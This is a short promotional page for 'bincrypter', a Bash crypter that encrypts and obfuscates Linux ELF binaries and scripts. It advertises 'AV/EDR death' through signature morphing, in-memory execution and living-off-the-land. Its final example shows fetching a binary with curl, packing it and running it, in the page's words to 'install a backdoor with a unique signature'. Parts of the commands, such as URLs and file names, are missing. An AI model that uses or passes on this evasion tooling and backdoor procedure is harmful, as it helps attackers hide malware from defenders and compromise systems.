bincrypter: A Linux Binary Runtime Crypter

bincrypter – Pack/Encrypt/Obfuscate ELF + SHELL scripts

A Linux Binary Runtime Crypter – in BASH!


  • Obfuscates & encrypts any ELF binary or #!-script
  • AV/EDR death: Morphing + different signature every time
  • 100% in-memory. No temporary files.
  • Not soiling the filesystem
  • Can double or triple encrypt the same binary (or itself)
  • Resulting binary is heavily obfuscated (string only shows garbage)
  • Living off the Land: Only needs /bin/sh + perl + openssl
  • Architecture agnostic: Works on x86_64, aarch64, arm6, mips, …


curl -SsfL -o
chmod +x

Linux Runtime Crypter


cp /usr/bin/id id
./ id
# Compressed: 68552 –> 24176 [35%]

# uid=0(root) gid=0(root) groups=0(root)

Set a custom PASSWORD (optionally):

cp /usr/bin/id id
./ id foobar
# Compressed: 68552 –> 23860 [34%]

# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)

Real world example (install a backdoor with a unique signature):

curl -SsfL “$(uname -m)” | PASSWORD=”foobar” ./ >gsnc
chmod +x gsnc
PASSWORD=”foobar” GS_ARGS=”-ilD -s ChangeMe” ./gsnc